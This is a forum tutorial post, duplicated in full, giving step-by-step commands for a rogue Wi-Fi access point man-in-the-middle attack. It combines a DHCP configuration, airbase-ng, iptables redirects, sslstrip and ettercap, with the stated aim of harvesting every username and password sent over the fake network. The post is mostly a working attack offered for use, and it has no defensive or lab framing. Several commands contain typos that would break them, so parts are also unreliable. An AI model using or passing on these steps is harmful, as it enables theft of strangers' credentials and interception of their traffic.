Show Posts
1
Tutorials / Rogue AP MiTM Attack (Fake AP)
« on: June 13, 2014, 08:02:29 pm »
Introduction
That's what Wikipedia says: A rogue access point is a wireless acces point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a hacker to conduct a man-in-the-middle-attack .
basicaly a Rogue Ap is a fake Ap which you can use to do MiTM attacks. if you don't know what those ar -> http://lmgtfy.com/?q=Man+in+the+middle+attack
This method uses a dhcp server. There are other methods which I will cover in another tutorial.
So let's start.
What do you need?
1. Either a VM running Kali or a PC/Laptop running it
2. 2x Network adapter (or a wired connection)
3. one of them must support both, monitor and master mode
What do you need to do?
Configure the DHCP Server
1. Open terminal
2. route -n (note Gateway I'll assume the GW is 192.168.0.1)
3. apt-get install dhcp3-server (install the dhcp3 server)
4. nano /etc/dhcpd.conf (configure the dhcp serv)
5. type or paste the following into your .conf
authorative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name "name you want the router to be called"
option domain-name-servers 192.168.1.1;
ranger 192.168.1.2 192.168.1.40;
}
6. Hit ctrl+x then y then enter (save the file)
Start the AP
1. airmon-ng (check Net.Adap. will asume it's wlan0)
2. airmon-ng start wlan0 (start the mon mode = mon0)
3. airbase-ng -c 11 -e "name you want it to be called" mon0
4. DON'T CLOSE THE TERMINAL
Configure the Tunnel Interface
1. Open Terminal.
2. ifconfig at0 192.168.1.1 netmask 255.255.255.0 (set ip and netmask)
3. ifconfig at0 mtu 1400 (set MTU)
4. route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 (add routing table)
5. echo 1 </procs/sys/net/ipv4/ip_forward (enable IP forwarding)
6. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1 (entering iptables rules)
7. iptables -P FORWARD ACCEPT (accept forwarding)
8. iptabels --append FORWARD --in-interface at0 -j ACCEPT
9. iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
10. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to- port 10000
Start DHCP Server
1. dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
2. /etc/init.d/isc-dhcp-server start
Starting SSL Strip
1. sslstrip -f -p -k 10000
2. DON'T CLOSE TERMINAL
Harvest
1. Open terminal
2. ettercap -p -u -T -q -i at0 (start ettercap)
Congrats! If you have't run into any errors you should be able to get all user/pass that are beeing sent over the AP.
-D1M4
Staff note: WHAT THE FUUUUUUUUK too much bbcode :/
That's what Wikipedia says: A rogue access point is a wireless acces point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a hacker to conduct a man-in-the-middle-attack .
basicaly a Rogue Ap is a fake Ap which you can use to do MiTM attacks. if you don't know what those ar -> http://lmgtfy.com/?q=Man+in+the+middle+attack
This method uses a dhcp server. There are other methods which I will cover in another tutorial.
So let's start.
What do you need?
1. Either a VM running Kali or a PC/Laptop running it
2. 2x Network adapter (or a wired connection)
3. one of them must support both, monitor and master mode
What do you need to do?
Configure the DHCP Server
1. Open terminal
2. route -n (note Gateway I'll assume the GW is 192.168.0.1)
3. apt-get install dhcp3-server (install the dhcp3 server)
4. nano /etc/dhcpd.conf (configure the dhcp serv)
5. type or paste the following into your .conf
authorative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name "name you want the router to be called"
option domain-name-servers 192.168.1.1;
ranger 192.168.1.2 192.168.1.40;
}
6. Hit ctrl+x then y then enter (save the file)
Start the AP
1. airmon-ng (check Net.Adap. will asume it's wlan0)
2. airmon-ng start wlan0 (start the mon mode = mon0)
3. airbase-ng -c 11 -e "name you want it to be called" mon0
4. DON'T CLOSE THE TERMINAL
Configure the Tunnel Interface
1. Open Terminal.
2. ifconfig at0 192.168.1.1 netmask 255.255.255.0 (set ip and netmask)
3. ifconfig at0 mtu 1400 (set MTU)
4. route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 (add routing table)
5. echo 1 </procs/sys/net/ipv4/ip_forward (enable IP forwarding)
6. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1 (entering iptables rules)
7. iptables -P FORWARD ACCEPT (accept forwarding)
8. iptabels --append FORWARD --in-interface at0 -j ACCEPT
9. iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
10. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to- port 10000
Start DHCP Server
1. dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
2. /etc/init.d/isc-dhcp-server start
Starting SSL Strip
1. sslstrip -f -p -k 10000
2. DON'T CLOSE TERMINAL
Harvest
1. Open terminal
2. ettercap -p -u -T -q -i at0 (start ettercap)
Congrats! If you have't run into any errors you should be able to get all user/pass that are beeing sent over the AP.
-D1M4
Staff note: WHAT THE FUUUUUUUUK too much bbcode :/
